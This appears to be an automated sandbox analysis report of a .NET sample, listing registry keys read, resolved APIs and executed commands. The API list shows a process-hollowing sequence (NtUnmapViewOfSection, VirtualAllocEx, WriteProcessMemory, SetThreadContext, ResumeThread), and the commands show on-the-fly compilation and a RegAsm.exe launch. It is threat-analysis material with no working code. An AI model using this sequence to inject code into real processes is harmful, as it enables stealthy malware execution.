HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.DeleteFileA
kernel32.dll.WideCharToMultiByte
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
advapi32.dll.EventUnregister
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
clr.dll.CreateAssemblyNameObject
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.cmdline"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES1CAB.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC8433AF33BDC4010A2A509683359DD.TMP"

Started Services

Nothing to display

Created Services

Nothing to display

#infosec #automation

TheSystem Itself @ 2018-05-03 16:30:06